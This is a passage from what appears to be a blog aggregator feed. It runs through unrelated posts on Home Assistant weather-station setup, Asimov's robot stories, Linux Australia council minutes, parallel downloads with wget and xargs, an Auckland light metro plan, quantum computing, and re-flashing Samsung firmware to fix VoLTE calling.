The finally, we have the correct command line for rtl_433 for this weather station. Note that “mqttserver” is probably not the name of your MQTT server. This command line names the MQTT topic for the model and ID of the weather station, so if you had more than one of these you’d get separate topics for them. My weather station appears at “rtl_433/Bresser-6in1/848729174” for example.
In terms of completeness, the logs from rtl_433 look like this (reformatted to not be ugly, its all a single line in the actual user interface):
{
"time": "2025-06-24 05:07:44",
"model": "Bresser-6in1",
"id": 848729174,
"channel": 0,
"battery_ok": 1,
"temperature_C": 20.5,
"humidity": 31,
"sensor_type": 1,
"wind_max_m_s": 0,
"wind_avg_m_s": 0,
"wind_dir_deg": 234,
"uv": 0,
"flags": 0,
"mic": "CRC"
}
{
"time": "2025-06-24 05:07:56",
"model": "Bresser-6in1",
"id": 848729174,
"channel": 0,
"sensor_type": 1,
"wind_max_m_s": 0,
"wind_avg_m_s": 0,
"wind_dir_deg": 234,
"rain_mm": 1.2,
"flags": 1,
"mic": "CRC"
}And the MQTT writes match this format as well. I’m not entirely sure why the device wants to send two updates, but more power to it.
Finally, we just need to write it up to Home Assistant. I am going to assume you already have MQTT configured, and wont talk about that bit. However, I have these in my configuration.yaml file:
mqtt:
- sensor: !include mqtt/sensors.yaml
- binary_sensor: !include mqtt/binary_sensors.yamlWhich is including mqtt/sensors.yaml:
- name: "Weather station temperature"
force_update: true
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.temperature_C }}"
unit_of_measurement: "°C"
- name: "Weather station humidity"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.humidity }}"
unit_of_measurement: "%"
- name: "Weather station wind average"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.wind_avg_m_s }}"
unit_of_measurement: "m/s"
- name: "Weather station wind maximum"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.wind_max_m_s }}"
unit_of_measurement: "m/s"
- name: "Weather station wind direction"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.wind_dir_deg }}"
unit_of_measurement: "degrees"
- name: "Weather station rain"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.rain_mm }}"
unit_of_measurement: "mm"
- name: "Weather station UV"
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.uv }}"And mqtt/binary_sensors.yaml:
- name: "Weather station battery ok"
force_update: true
payload_on: 1
payload_off: 0
state_topic: "rtl_433/Bresser-6in1/848729174"
value_template: "{{ value_json.battery_ok }}"I hope this saves someone, possibly future me, some time setting this up. It took me a few hours to get this all working today.
I’ve read this book a few times, but honestly the Foundation TV series has left me with a new enthusiasm to re-read some Asimov stuff. I have previously read the entire extended multi-author series, and honestly a fair few of them sucked — especially the ones by other authors — so this time I have the luxury of being a bit more picky. Worse, Asimov remixed the robot stories several times into various volumes, and it can be quite confusing. The Complete Robot contains all the robot stories, and replaces I, Robot (reading one, reading two), The Rest of the Robots; Robot Dreams; and Robot Visions. It also contains a couple of previously unpublished stories.
Most recently I read the stories in 2019, where I found its 1950s treatment of gender issues a bit concerning. I did not have such concerns in 2012 when I was more focused on how the lack of monetary inflation in the book dated it (among other things). This time around, I made it exactly one page into I, Robot before finding a new way that the book is showing its age — it immediately comments that an important part of robot design is that you be able to predict the behaviour of the machine. This is an interesting point in these days of widespread unpredictable and hallucinating generative AI models. We still have a long way to go it seems. There are of course other ways the book has aged — wire recorders, the lack of ubiquitous computing, the dates! However, it seems petty to begrudge Asimov those for a book which is having its 75th birthday this year.
Overall I’d say my 2025 take on The Complete Robot is that it is definitely dated although many of the stories are still good. I cringe at the descriptions of Susan Calvin as loveless because she doesn’t have a partner, and the story with curing Autism as a central plot line made me deeply uncomfortable. This book however is a product of its time I suppose.
My other criticism is that the book is too long. Sure its a collection of short stories, but some of them are better than others and a big more vigor in the curation process would have produced a better read. This book took so long to read because there were definitely periods where I struggled to be motivated to read more because the characters simply weren’t interesting.
So, N years later, how is that going? It was going pretty well, but then there was a pandemic with lock-downs and curfews, which rather restricted access to dark skies.The obvious fix was to obtain access to dark skies, by way of a holiday house in the Wimmera.
In the mean time there were also a bunch of revolutions in astronomy, mostly to blame on open hardware. That means it is now possible to buy an off the shelf computer to control a bunch of mounts, cameras, auto-focusers, dew heaters and other gear. These are essentially raspberry pi machines with a modified operating system and (generally) a mobile app to control them.
Rather than fight software, keep laptops (and myself) out in the cold and kludge together VNC access, I got one of these machines (an asiair mini) and data acquisition is now mostly automated and not a problem. I set it up, tell it what I want, and in the morning I have images.
I do however still use open source software on Mac OS X to do my data processing. Notably I use Siril for pre-processing, stacking, stetching and noise reduction.
Fateful Choices, Ten Decisions That Changed the World, 1940-1941 by Ian Kershaw
A fascinating book covering decisions from the point of view of the wartime leaders making them. Highly recommend 5/5
Charged: A History of Batteries and Lessons for a Clean Energy Future by James Morton Turner
More a history of pollution from batteries and their construction than a straight history of the technology. It delivers that well enough though 3/5
Box Office Poison: Hollywood’s Story in a Century of Flops by Tim Robey
Covers 26 movies (skipping some of the best known) with fun behind-the-scenes tales of disaster and over-reach. 4/5
My Audiobook Scoring System
I’ve been thinking a bit about training at work recently, largely in the context of having spent the last twenty years working for US technology companies. I think effectively all of these companies made a pretty big mistake — they viewed training of employees as a perk much like vacation, book budgets, or t-shirts. They advertise their training programs as part of their recruitment process, and just like other perks they’re cut when times get a bit grim. However, that’s not actually why employers should train their people. We train people so that they have the skills they need to do their jobs — especially when things get real and aren’t working out to plan.
There are definitely industries who have good examples of this sort of risk reduction training done well — airlines and the military both engage in regular training activities that ensure that when things get exciting the people know what to do. This includes leaders being trained on how to make decisions that are likely to result in the desired outcomes.
However… High tech is not one of those places. I’ve seen a lot of tailored in-house training programs replaced by a corporate Udemy or LinkedIn Training subscription, and I have seen very little evidence that these all-you-can-eat e-learning platforms actually deliver much in terms of results. This is especially true because I am yet to meet an organization that gives their employees enough contiguous time to actually do one of these e-learning courses without doing it on their own time or with frequent context switches. I think what they do deliver is a training thing you can put on your HR site that has a fixed cost to the company.
I think its also true that individual employees should focus their self-funded training (if they do any, I suspect its rare) on skills that they find interesting or align with their longer term career goals. It is not the role of an individual to subsidize their employer.
When I rule the world (which is looking increasingly unlikely, but anyways), I think I’d start by identifying the skills a given team need to succeed — both in the base case of business as usual, but also in times of crisis. I’d stack rank those skills, and then I’d ensure that the team had at least a couple of examples of each skill. Perhaps the availability of a skill should be proportional to both the likelihood and impact of the risk if guards against? I wouldn’t be too concerned about the employment type of the people being trained either — if you seniors are contractors that’s not relevant, I still want my senior people to have the skills needed when they need them.
But I don’t rule the world. So I’ll just keep doing random learning things on my own time because they personally interest me, not because my employer of the day might one day need them.
Meeting opened at 19:39 AEDT by Joel and quorum was achieved.
Minutes taken by Neill
For all membership applications we want to see some involvement from prospective members. We will update the membership application form to collect this for new applications. For existing pending ones we will ask via email.
Meeting closed at 20:49
Next meeting is scheduled for 2025-05-21 and is a subcommittee meeting
The post 2025–05-07 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 08:02 AEDT by Jenny and quorum was achieved.
Minutes taken by Neill
Meeting closed at 22:11 AEDT
Next meeting is scheduled for 2025-03-12 at 20:00 UT+1100 (AEDT)
The post 2025-02-26 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 20:08 AEDT by Joel and quorum was achieved.
Minutes taken by Neill
Comes down to the areas that the conferences use, sometimes the venue reports catering and venue costs in the one line item.
We will look into the 14k office expenses for Kiwi PyCon
We have not yet had time to go through this report in detail.
It looks like they have managed to make an $18k profit, which is an impressive turnaround.
They are looking at putting in a bid to run another conference in Japan, but we need to have a clear understanding of what it would mean for LA, especially in terms of tax implications.
[RS]: If we do not exceed AUD$100,000 (approximately, converted from JPY) ticket sales to Japanese residents we will not have any tax obligations in Japan.
[JW] Question about liability for losses – normally these run through a professional events company – what would our liability for losses be?
[RS] The Drupal Association asks for a percentage of revenue which is not acceptable.
[JA] The DA is keen to move to a percentage of revenue. We need a new agreement to run the next conference anyway. Not keen to commit to a percentage of revenue as that exposes LA to more risks. Apart from tax, the other item to be sorted out is insurance.
[JC] What is the DA giving to the conference?
[JA] They dedicate some resources for marketing and possibly send some people to the conference. Need to dig into the details more.
[RS] We should be able to ask our accountant about the tax implications.
We may need a separate meeting to discuss this with the organising team.
Miles has started the process of building a team to bid to run EO in Canberra in 2026.
Carlos from OpenSI is also keen to host the event in Canberra. Carlos has concerns about the effort involved, but is keen to run the conference. It would be good if Carlos spoke to Miles.
OpenSI (and Carlos) have sponsored the last two Everything Opens.
Has been removed from the mailing list after sending a number of strange emails to the list and then contacting people on the list directly in inappropriate ways.
He was warned that if he didn’t stop he would be unsubscribed. He did not stop and has now been unsubscribed.
Have told us they are at least pausing things, until such time as they find new people to run events.
They have asked for $1,000 for “contingencies” which is difficult. They should submit expense claims instead.
We should also offer to provide hosting for them in order to reduce their expenses.
Council has received a defamation concern notice. This has been discussed at a separate meeting. We are waiting for a response.
We received a budget and starting team. Council has not yet had time to go through the proposal in detail. Council members will individually review the proposal over the next few days and discuss any issues as a group.
Again. Council has not yet had time to go through the proposal in detail. Council members will individually review the proposal over the next few days and discuss any issues as a group.
We have particular concerns around the WordPress/WordCamp central entities and their recent actions.
Meeting closed at 21:32
Next meeting is scheduled for 2025-02-26 at 20:00 UT+1100 (AEDT) which will be a subcommittee meeting.
The post 2025-02-12 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 19:35 AEDT by Joel. Quorum was achieved.
Minutes taken by Neill and Jonathan..
This is correspondence which was sent to Council. Any communication sent directly to the secretary or other executive addresses is not included.
Meeting closed at 21:07 AEST (UT+1000).
Next meeting is scheduled for 2025-05-07 19:30 AEST (UT+1000)
The post 2025-04-23 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 19:32 AEST by Joel and quorum was achieved.
Minutes taken by Neill
https://drive.google.com/file/d/19UmKe7QRFSQdSlgcw2rnkws73Hq6MK2U/view?usp=drive_link
Once Joel has received clarification we will move a vote on the final document via email.
Meeting closed at 19:51 AEST
Next meeting is scheduled for 2025-04-23 and is a subcommittee meeting.
The post 2025-04-09 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 20:18 AEDT by Joel and quorum was achieved.
Minutes taken by Neill
Moved by: Joel
Seconded: Neill
Outcome: Motion passed
Discussed scenario where Drupal Association don’t accede to this agreement. It would depend on how they respond, in the worst case scenario we will withdraw our support.
Russell will discuss our concerns over the budget with KiwiPyCon.
Motion: That Linux Australia accepts Kiwi PyCon 2025 as an event subcommittee based on the provided budget.
Moved by: Joel
Seconded: Elena
Outcome: Motion passed
Two items were discussed in camera
Meeting closed at 21:46
Next meeting is scheduled for 2025-03-26 and is a subcommittee meeting.
The post 2025-03-12 Council Meeting Minutes appeared first on Linux Australia.
Meeting opened at 20:30 AEDT by Russell. Quorum was achieved.
Minutes taken by Jonathan.
This is correspondence which was sent to Council. Any communication sent directly to the secretary or other executive addresses is not included.
Joel and/or Neill will work with Julia to arrange a suitable time.
Meeting closed at 21:32.
Next meeting is scheduled for 2025-04-09:
The post 2025-03-26 Council Meeting Minutes appeared first on Linux Australia.
The following is an illustration of how to use xargs to conduct parallel operations on single-threaded applications, specifically wget.
GNU wget is a great tool for downloading content from websites. The wget command is a non-interactive network downloader; by "non-interactive" what is meant is that it can be run in the background. Some very hand options include -c (continue, for partially downloaded files), -m (mirror, for an entire website), -r --no-parent (recursive, no parent, to download part of a website and its subdirectories). The cURL application has a wider range of protocols and includes upload options, but is non-recursive.
Recently, I had the need to download a small number of PDF files. The wildcard-based approach would be:
$ wget -r -nd --no-parent -A 'rpgreview_*.pdf' http://rpgreview.net/files/
The -r and --no-parent options have already been explained. The -nd option allows one to save all files to the current directory, without hierarchy of directories. The -A option ('accept', or -R 'reject) allows one to specify comma-separated lists of file name suffixes or patterns to accept or reject. Note that if any of the wildcard characters, *, ?, or ranges [] to be in an acclist or rejlist.
Running the above has the following time:
real 2m19.353s
user 0m0.836s
sys 0m2.998s
An alternatiive, looping through each file one at a time, would have been something like:
for issue in {1..53}
do
wget "https://rpgreview.net/files/rpgreview_$issue.pdf"
done
(Just for the record, wget can get a bit gnarly when dealing with http requests because for some webservers there is no requirement for path delimiters to match directory delimiters. For the purposes of this discussion it is assumed that we're dealing with a rational being where the two are equivalent.)
Using a combination of the printf command and the xargs command a list of the URLs can be constructed which is then passed to xargs which can split the list to run in parallel.
By itself, xargs simply reads items from standard input, delimited by blanks or newlines, and executes commands from that list of items as arguments. This is somewhat different to the pipe command which, by itself, sends the output of one command as the input stream to another. In contrast, xargs takes data from standard input and executes a command which, by default, the data is appended to the end of the command as an argument. However, the data can be inserted anywhere however, using a placeholder for the input; the typical placeholder is {}.
The value -P 8 is entirely arbitrary here and should be modified according to available resources. Adding -nc prevents xargs attempting to download the same file more than once (wget will not overwrite an existing file, but rather append a new file with .1, etc. The -n option ensures that only one argument is run per process.
printf "https://rpgreview.net/files/rpgreview_%d.pdf\n" {1..53} | xargs -n 1 -P 8 wget -q -nc
The time of the above comes to:
real 1m23.534s
user 0m1.567s
sys 0m2.732s
Yet another choice is to use GNU parallel and seq.
seq 53 | parallel -j8 wget "https://rpgreview.net/files/rpgreview_{}.pdf"
real 1m57.647s
user 0m1.830s
sys 0m4.214s
A final option, most common in high-performance computing systems with job schedulers, is to make use of a job array. This is effective assuming resource availability. This is a very effective option if each task in the array takes more than a couple of minutes each (given that there is an overhead involved in constructing the job, submitting it to the queue, etc). In Slurm, a script the directives and code would look like the following:
#SBATCH --job-name="file-array"
#SBATCH --ntasks=1
#SBATCH --time=0-00:15:00
#SBATCH --array=1-53
wget "https://rpgreview.net/files/rpgreview_${SLURM_ARRAY_TASK_ID}.pdf"
Never Panic Early: An Apollo 13 Astronaut’s Journey by Fred Haise
A fairly straightforward autobiography. Covers the areas you’d expect and has a few interesting stories that tie into the title. 3/5
My Scoring System for Books
Since I posted by idea for two Auckland light Metro lines I’ve had some feedback and made some updates. This is the new version of the article. At the bottom of this article I’m written about the changes and reasoning behind them. You can also read my article on Light Metro Technology to get more information about the technology I am proposing be used.
Below is the new network I am planning as a basis for Auckland. It consists of
In this post I’ll cover the North/South line. Not that all pictures/maps in the article can be opened to see the larger version
As outlined in a previous article Light Metro is Automated (driverless), Grade Separated with Short Trains and High Frequencies. It is well suited to Auckland where requirements exceed Light Rail but a full metro would be overkill.
The key advantages of Light Metro over street running light rail is it’s high capacity, frequency and higher speed. Attempting to push Light Rail beyond it’s natural sweet-spot result in a grade-separated system that costs as much as Light Metro but is worse and often costs more to run.
The below table shows the capacity of a Light Metro line (in each direction). For Auckland the stations outside the CBD could be serviced by buses to further increase coverage area. Trains could start at short length and frequency increased as high as possible before longer trains should be used.
| Headway / Trains per Hour | 2 Cars | 3 Cars | 4 Cars | 6 Cars |
| 5 min / 12 tph | 2,400 | 3,600 | 4,800 | 7,200 |
| 3 min / 20 tph | 4,000 | 6,000 | 8,000 | 12,000 |
| 2 min / 30 tph | 6,000 | 9,000 | 12,000 | 18,000 |
| 90 sec / 40 tph | 8,000 | 12,000 | 16,000 | 24,000 |
If the system is run with 4-car trains ( 52m long, 400 people ) then each line has the capacity over double one of the major Auckland motorways such as the Western or Southern.
This line would start from Takapuna run under the CBD and connect to the Airport in the South.
The line would be grade separated above the road as much as possible since this is cheaper than under-grounding. It would be underground though the central city however.
Total length would be around 28km of which around 6.2km would be underground. Cost would be something like $15b
This would be completely overhead and mainly above roadways. It would start from a station at Takapuna and then another station at the Existing Busway station of Akoranga.
The route would then go between the motorway and the sea until it reaches a tunnel across the harbour near Northcote Pt.
See section below for discussion as to the advantages and disadvantages of a tunnel vs a bridge for crossing Waitemata Harbour.
A route to Takapuna avoids duplicating the existing busway. Going off the 2024 bus statistics around 20% of the busway passengers go to Takapuna and Milford and it is likely some more would change from the bus to metro at Akoranga station if the Metro better served the southern part of their journey.
I have mapped out some possible extensions to this line but there are several other options.
A natural extension to this line would be a line to the North Shore Hospital and then Milford.
A line to Northcote and Birkenhead could also be built, although this line unfortunately goes the wrong way for Northcote and Birkenhead people going into the city.
Later lines might go down Wairau Rd to the Wairau Valley
The first station will be under the eastern end of Victoria Park. Ideally it should have entrances on the far sides of Fenshaw, Halsey and Victora Streets so passengers do not have to cross busy roads to reach it.
The Te Waihorotiu CRL station is apparently already future-proofed with space for a North/South line. The station will effectively be the centre of the Auckland System. There should also be a surface Light Rail line nearby on Queen Street.
The University station would be quite deep (because the line would be under Queen Street and the Grafton Valley Motorway) and probably be an elevator-only station.
I’ll cover how lines intersect later
South of the University the line has a station on the corner of Park Road to serve the Hospital, The Grafton Campus and nearby area. This station may be deep enough to also be elevator-only.
The line comes out of it’s tunnel just after the domain and is now elevated until it reaches the Airport.
The first station is on Carlton Gore road to serve Northern Newmarket. Then there is Station in central Newmarket connected to the existing rail station.
South of Newmarket the line will travel above Manukau Rd and continue South through Royal Oak and Onehunga.
Possible stations could be (at roughly 1km intervals):
The southernmost section crosses the Mangere harbour near the current bridges (No special bridge should be needed since it will be fairly low) and has a station at Mangere Bridge Village just South of the crossing.
The line then continues south along the Coronation Rd, McKenzie Rd and Bader Drive with the provision of a future station near Miller Road.
The station follows Bader Drive over the motorway to a station in Mangere town Centre. It then cuts over some houses (which will need to be purchased) back to the motorway and follows it South.
I’ve future proofed a station in the airport industrial area after which the line goes underground between Landing Drive and Ihumatoa Road for about 1km to a station under the airport.
The Depot for the Line would probably be best placed somewhere between the Airport and Mangere Town Center Station.
The plan currently has the line using a tunnel. This is probably about $1b more expensive than a bridge and makes it very difficult to provide a walking or cycling option.
The reason for this is that currently the Upper Harbour (West of the Auckland Harbour Bridge) has Chelsea Sugar Refinery and the Kauri Point Armament Depot. Both of these much be reachable by large ships. This requires a clearance of any bridge over the water to be similar to the current bridge’s 43 metres.
Since trains have problems with gradients much over 3% this would require over 1km of climb to reach which is almost impossible to fit south of the ship channel.
If the Sugar Refinery and Ammunition Depot can be moved then a lower bridge quickly becomes the best option. With a saving of over $1b it might be better to pay for them to move. However I have kept things as a tunnel for now.
This maps shows the other lines including the existing lines, a Queen St Light Rail and my proposed Western line.
The Victoria Park station as well as serving the immediate area supports transfers to the Western Line to get to lower-Queen Street and transfer to College Hill and Northcote buses
The Te Waihorotiu Station allows access to Aotea Square area and transfers to the CRL and Light Rail
The University Station serves the Universities and allows transfers to the Western line and Symonds Street Buses.
As the lines gets further South the demand on the single line will be reduced. So I propose that the line eventually branch just South of Newmarket
The new line would go down Great South Road as far as the existing Penrose Station and then East along Penrose Rd to meet the Sylvia Park station. It would then go East to Pakuranga and down Ti Rakau Dr to Botany. The existing Greenlane and Remuera stations could perhaps be replaced by Stations on the line
Because Light Metro can handle very high frequency, capacity on both branches would be high. For example trains could be every 2 minutes in the central areas and every 4 minutes on the branches
I’ve sketched out some later lines mainly to make sure the planned line has room for growth.
The first is a line from Mangere Town Center to Botany that goes though Papatoetoe and Otara.
The other is a cross town line that Starts in Point Chevalier and Follows Carrington, Mt Albert, Mt Smart and Great South Roads to Manakau City.
Penrose station would be a natural intersection point for two of the lines (and the existing heavy rail) and could be upgraded to be a major transfer station.
It is important to keep the cost of the line down as much as possible to improve it’s chances of being built. Especially the urge must be avoid to create expensive monumental stations or under-grounding more sections to avoid perceived disruption.
I propose the following measures
Note that driverless operation allows frequent trains which in turn allow shorter trains which means smaller cheaper stations.
I put my costs are what I consider realistic New Zealand levels. Some countries are able to build for less but I’ve listed what I hope New Zealand can build for.
North/South Line length by type of track
Total cost
Travel times for this sort of Metro are around 30km/h including stops although this line has fewer stops than most and some long stretches so should be a bit faster. Assuming 30km/h we get:
Currently the Airport takes around 1h 30m via public transport and 40 minutes for the Skydrive private Airport bus outside of peak times. The bus from Takapuna takes 20-25 minutes. Remember that the metro will have very high fequency so waiting for the next train will only be a couple of minutes.
I’ve tried to make the route realistic and useful. As far as I can tell all the climbs are within the capacity of a typical metro system. However some of the corners may be a little tight and additional space may be needed.
While only a small proportion of the passengers will travel to and from the airport I think the service will be great for this. Some people do express concern about room for luggage but riders manage on other systems around the world.
I think that this line and the Western line has a great potential to improve transport across Auckland. It will take pressure off the Northern Busway and also add huge capacity to the South West and Airport.
My next article will cover my proposal for a Western Line
General
I’ve made 3 stations on the line optional to save cost and increase speed
North Shore
Instead of replacing the Northern busway I’ve updated the line to go to Takapuna and eventually Milford instead. This will be around 1.7km from Akoranga Station rather than 10km so it should say $2-3 billion from the initial build and mean that we augment the Northern Busway rather than replace it..
I’ve included a few possible routes but there are a lot of options both for the initial route into Takapuna and future lines.
Central City
I’ve replace the Wynyard and Victoria stations with a single station under the east of Victoria Park. It would also have a similar service area to the two stations.
I’ve also rerouted the end of the Western Line to go along Fenshaw St rather than across the Viaduct Basin
Auckland Hospital
My original plan had the line going South from the University, under the motorway and Museum and emerging on the North of Newmarket
However skipping the hospital seems a bad idea. It is a huge trip generator not just for the hospital but for the Grafton Campus and other businesses and housing nearby.
So I’ve updated the route to have a station under the corner of Park road and the line emerging on Carlton Gore road with a station near the bottom of that road.
Mangere
I’ve changed Mangere town centre to be directly on the line instead of a short branch. This does mean the line goes through housing to get back on the motorway.
Also got rid of one station in Mangere Bridge.
Credits for suggestions on changes
It is appropriate, on World Quantum Day, to talk about quantum computing and quantum computers, as the two are often confused. Quantum computing is any method to generate quantum effects whereby qubit states can exist in superposition (o,1, both) rather than binary states (0,1). Binary states are represented in classical computing in low-level software as logical 0s and 1s but in hardware as high and low-voltage states.
The typical system to do quantum computing, or at least simulate it, is usually High Performance Computing (HPC). That works, it's a proven technology that has a rate of return of $44 per $1 invested - and higher when COVID research is considered. The development of HPC clusters with message passing is one of the most successful technological developments in computing in the last thirty years.
In contrast, a quantum computer directly uses a quantum mechanical system and requires appropriate specialised hardware. For example, GENCI in France uses a photonic computer, LRZ in Germany uses superconducting qubits, PSNC in Poland uses trapped ions, etc. David P. DiVincenzo offers the most significant physical challenges that face quantum computers, regardless of what technology is used; these include scaling qubits, initialisation of values, developing a universal gate for the construction of a quantum operation, developing gates that are faster than decoherence from a quantum state due to environmental interactions, and reading qubits (especially considering that can alter the quantum state).
As a result, classical computers outperform quantum computers in all real-world applications. Not only that, there is a serious issue of whether quantum computers will ever be able to outperform classical computers. Mikhail Dyakonov points out that the rudimentary qubits used in quantum computing systems is insufficient for useful calculations.
"Experts estimate that the number of qubits needed for a useful quantum computer, one that could compete with your laptop in solving certain kinds of interesting problems, is between 1,000 and 100,000. So the number of continuous parameters describing the state of such a useful quantum computer at any given moment must be at least 21,000, which is to say about 10^300. That's a very big number indeed. How big? It is much, much greater than the number of subatomic particles in the observable universe."
The promise of quantum computers is, of course, very significant in theory. In theory, it can perform some calculations incredibly fast, and the larger the task, the more impressive the result, to the extent that common secure encryption systems could be broken, as well as the more prosaic use in quantum simulations. In reality, the physical implementation has been more than challenging, to put it mildly. Classical computers, in principle, can solve the same problems as a quantum computer can, in principle solve as well. For a classical computer the problem is the sheer quantity of time that is required. For quantum computers, the problem is the implementation in reality. For the time being, and for the foreseeable future, it seems that quantum computing will continue to be done on classical computers.
| Attachment | Size |
|---|---|
 IBM System 1 Quantum Computer | 189.81 KB |
Wednesday, 9th April 2025, 8:00pm AEST
Meeting started at 8:00pm AEST.
MR JOEL ADDISON, President
As was flagged earlier and at the AGM, we need to go through a process of amending our constitution if we want to remain as a not for profit.
The deadline for this process is 30 June 2025
Thank you Russell for the hard work in preparing the necessary changes as a series of pull requests. Thank you to everyone who reviewed and provided feedback on the changes.
Before we vote, is there anything anyone wants to bring up for discussion?
[No issues raised]
Question: Do we have a quorum?
Answer: Yes and everyone in the meeting is qualified to vote as a member of Linux Australia.
We have had nine proxies registered. We will process the vote via a Zoom poll and then add the proxies. It requires a 75% vote in favour for the change to pass.
MOTION by Joel Addison that the complete constitution, as set out within the constitution.md file at https://github.com/linuxaustralia/constitution_and_policies/pull/47/files, be adopted.
Seconded by: Neill Cox
Motion raised via Zoom poll
Zoom results: 100% in favour (24 votes cast), plus Russell Stuart and Joel Addison
Proxies: 9 proxies also voted in favour
In total 35 votes and unanimously in favour.
We will now send this to the NSW Government to have it officially registered. Once it is registered then we will merge the pull request.
Meeting closed at 20:19 AEST
The post Minutes of Linux Australia – Special General Meeting April 2025 appeared first on Linux Australia.
My wife and I were with Optus for our mobile phone service since approximately the dawn of time, but recently decided to switch to another provider. We’d become less happy with Optus over the last few years after a data breach in 2022, an extended outage in 2023, and – most personally irritating – with them increasing the price of our plan despite us being under contract. Yes, I know the contract says they’re allowed to do that given 30 days notice, but they never used to do that. If you signed up for a $45 per month (or whatever) plan for two years, that’s what you paid per month for the duration. Not anymore. To their credit, when my wife lodged a complaint about this, they did end up offering us a 10% discount on our bill for the next 24 months, which effectively brought us back to the previous pricing, but we still maintain this practice just isn’t decent, dammit.
The question was: which provider to switch to? There are three networks in Australia – Telstra, Optus and Vodafone, so you either go with one of them, or with someone who’s reselling services on one of those networks. We already have a backup pre-paid phone with Telstra for emergencies, and so preferred the idea of continuing our main service on some other network for the sake of redundancy. iiNet (our ISP) repeatedly sent us email about nice cheap mobile services, but they were reselling Vodafone, and we’d always heard Vodafone had the worst coverage in regional Australia so we initially demurred. A few weeks ago though, iiNet told us they’d doubled their network coverage. It turns out this is due to TPG (iiNet and Vodafone’s parent) striking a deal with Optus for mutual network access. This all sounded like a good deal, so we ran with it. We received a new SIM each in the mail, so all we needed to do was log in to the iiNet toolbox website, receive a one time-code via SMS to confirm the SIM port, then put the new SIM in each of our phones, power cycle them and wait to connect. We decided to do one phone at a time lest we be left with no service if anything went wrong. I did my phone first, and something did indeed go wrong.
After doing the SIM activation dance, my phone – an aging Samsung Galaxy A8 4G which Optus had given me on a two year contract back in 2018 – said it was connected to iiNet. Mobile data worked. SMS worked. But I could not make or receive calls. Anyone I tried to call, the phone said “calling…” but there was no sound of a phone ringing, and eventually it just went >clunk< “call ended”. Incoming calls went straight to voicemail, which of course I could not access. Not knowing any better I figured maybe it was a SIM porting issue and decided to ignore it for a day in the hope that it would come good with time. Forty-eight hours later I realised time wasn’t working, so called iiNet support using this thing:
The extremely patient and courteous Jinky from iiNet support walked me through restarting my phone and re-inserting the SIM (which of course I’d already done), and resetting the network settings (which I hadn’t). She also did a network reset at their end, but I still couldn’t make or receive calls. Then she asked me to try the SIM in another handset, so I swapped it into our backup Telstra handset (a Samsung Galaxy S8), and somewhat to our surprise that worked fine. We double checked my handset model (SM-A530F) against the approved devices list, and it’s there, so it should have worked in my handset too… Alas, because we’d demonstrated that the SIM did work in another handset, there was nothing further Jinky could do for me other than suggest using a different handset, or finding a technician to help figure out what was wrong with my Galaxy A8.
After a lot of irritating searching I found a post on Whirlpool from someone who was having trouble making and receiving calls with their Galaxy A8 after the 3G network shutdown in late 2024. The interesting thing here was that they were using an Optus-branded but unlocked phone, with a Testra SIM. With that SIM, they couldn’t make or receive calls, but with an Optus SIM, they could. This sounded a lot like my case, just substitute “iiNet SIM” for “Testra SIM”. The problem seemed to be something to do with VoLTE settings? or flags? or something? That are somehow carrier dependent? And the solution was allegedly to partially re-flash the handset’s firmware – the CSC, or Country Specific Code bits – with generic Samsung binaries.
So I dug around a bit more. This post from Aral Balkan about flashing stock firmware onto a Galaxy S9+ using the heimdall firmware flashing tool on Ubuntu Linux was extremely enlightening. The Samsung Updating Firmware Guide on Whirlpool helpfully included a very important detail about flashing this stuff:
- Use CSC_*** if you want to do a clean flash or
- HOME_CSC_*** if you want to keep your apps and data. <== MOST PEOPLE USE THIS
The next question was: where do I get the firmware from? Samsung have apparently made it extremely difficult to obtain arbitrary firmware images directly from them – they’re buried somewhere in encrypted form on Samsung’s official update servers, so I ended up using samfw.com. I downloaded the OPS (Optus), VAU (Vodafone) and XSA (unbranded) firmware archives, matching the version currently on my phone, extracted them, then compared them to each other. The included archives for AP (System &Recovery), BL (Bootloader) and CP (Modem / Radio) were all identical. The CSC (Country / Region / Operator) and HOME_CSC files were different in each case. These are the ones I wanted, and the only ones I needed to flash. So, as described in the previously linked posts, here’s what I ended up doing:
heimdall flash --CACHE cache.img --HIDDEN hidden.img and waited in terror for my handset to be bricked.The procedure worked perfectly. VoLTE – which wasn’t previously active on my phone – now was, and I could make and receive calls. VoLTE stands for Voice over Long-Term Evolution, and is the communications standard for making voice calls on a 4G mobile network.
It was at this point that the woefully untrained infosec goblin who inhabits part of my brainstem began gibbering in panic. Something along the lines of “what the hell are you doing installing allegedly Samsung firmware from a web site you found listed in a random forum post on the internet?!?”
I believed from everything I’d read so far that samfw.com was reputable, but of course I had to double-check. After an awful lot of screwing around on a Windows virtual machine with a combination of SamFirm_Reborn (which could download Samsung firmware once I tweaked SamFirm.exe.config to not require a specific .NET runtime, but couldn’t decrypt it due presumably to that missing .NET runtime), and SamFirm (which can’t download the firmware due to Samsung changing their API to need a serial number or IMEI, but could decrypt what I’d downloaded separately with SamFirm_Reborn), I was able to confirm that the firmware I’d downloaded previously does in fact match exactly what Samsung themselves make available. So I think I’m good.
The SIM activation dance on my wife’s phone – a rather newer Samsung Galaxy S21 Ultra 5G – went without a hitch.
Neuro-divergence, encompassing conditions such as autism spectrum, ADHD, and sensory processing, can profoundly influence how individuals perceive and respond to their bodily signals.
While neurotypical individuals generally recognise and respond to hunger, thirst, and satiety cues with relative ease, neuro-divergent individuals often face unique challenges in this area. Understanding these challenges is crucial for fostering empathy and supporting effective strategies for well-being.
This article is written so it is directly readable and useful (in terms of providing action items) for people in your immediate surroundings, but naturally it can be directly applied by neuro-spicy people themselves!
For many neuro-divergent people, recognising hunger and thirst cues can be a complex task. These signals, which manifest as subtle physiological changes, might not be as easily identifiable or may be misinterpreted.
